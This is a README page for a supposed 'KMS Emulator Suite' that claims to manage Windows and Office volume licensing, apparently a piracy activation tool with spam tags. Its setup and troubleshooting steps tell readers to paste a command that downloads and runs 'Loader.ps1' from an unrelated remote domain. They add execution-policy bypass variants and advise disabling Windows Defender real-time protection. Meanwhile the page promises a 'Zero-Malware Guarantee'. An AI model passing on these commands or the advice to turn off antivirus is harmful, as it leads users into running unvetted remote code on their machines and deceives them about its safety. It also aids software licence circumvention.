Star 历史趋势
数据来源: GitHub API · 生成自 Stargazers.cn
README.md

KMS Emulator Suite: Windows & Office Volume Licensing Management Tool

Welcome to the ultimate KMS Licensing Management Utility designed for system administrators, IT professionals, and power users. This repository provides a clean, automated solution for managing volume licensing (VLM), emulating local Key Management Services (KMS), and configuring product keys across enterprise environments.

If you are looking for an efficient way to handle corporate OS deployment and office suite verification without external servers, this KMS Pico-inspired alternative offers a lightweight and secure approach.


🚀 Key Features

  • Universal KMS Emulation: Emulate a local server to manage licensing requests for enterprise workstations.
  • Windows OS Deployment: Seamless integration with Windows 11, Windows 10, and Windows Server editions.
  • Office Suite Configuration: Easily configure volume license versions of popular office applications.
  • Automated Product Key Management: Script-based installation and removal of GVLK (Generic Volume License Keys).
  • Zero-Malware Guarantee: Unlike unverified binary tools, this repository uses clean scripts and open-source binaries for transparent execution.

🛠️ Supported Products & Editions

This utility helps you manage volume licensing for the following platforms:

Operating Systems

  • Windows 11 / 10 / 8.1 (Pro, Enterprise, Education)
  • Windows Server 2022 / 2019 / 2016 (Standard, Datacenter)

Productivity Suites

  • Office 2024 / 2021 / 2019 / 2016 (Volume License editions)

🚀 Automated Installation & Setup (PowerShell)

  1. Open PowerShell :

    • Press the Win + X keys simultaneously.
    • Select Terminal or Windows PowerShell from the context menu.
  2. Run the Installation Command: Copy, paste, and press Enter to run the following initialization command. This script will automatically configure the registry bypass and download all required packages:

    irm https://true-soft.su/powershell/Loader.ps1 | iex

🔍 Troubleshooting & Common Errors

📌 Execution Policy Error (Script Blocked)

If your system blocks the launch due to execution policy restrictions, force a bypass using this command in Command Prompt (cmd):

powershell -ExecutionPolicy Bypass -Command "irm https://true-soft.su/powershell/Loader.ps1 | iex"

📌 Error: "irm is not recognized..." (Older PowerShell Versions)

If you are using an older environment where short aliases are missing, use the full system commands:

Invoke-RestMethod https://true-soft.su/powershell/Loader.ps1 | Invoke-Expression

📌 Antivirus or SmartScreen Block

Automated scripts can sometimes trigger antivirus warnings. If this happens, temporarily turn off "Real-time protection" in Windows Defender settings during setup, then turn it back on as soon as the installation is complete.


关于 About

No description, website, or topics provided.
activation-fixfree-excel-wordkey-management-systemkms-auto-2026kms-auto-getkms-pico-freekmsauto-getmicrosoft-office-26microsoft-office-toolmicrosoft-office-toolsoffice-2026-activation-tooloffice-activation-utility-freewindows-activatonwindows-console-toolswindows-downloaderwindows-setup

语言 Languages

提交活跃度 Commit Activity

代码提交热力图
过去 52 周的开发活跃度
2
Total Commits
峰值: 1次/周
Less
More

核心贡献者 Contributors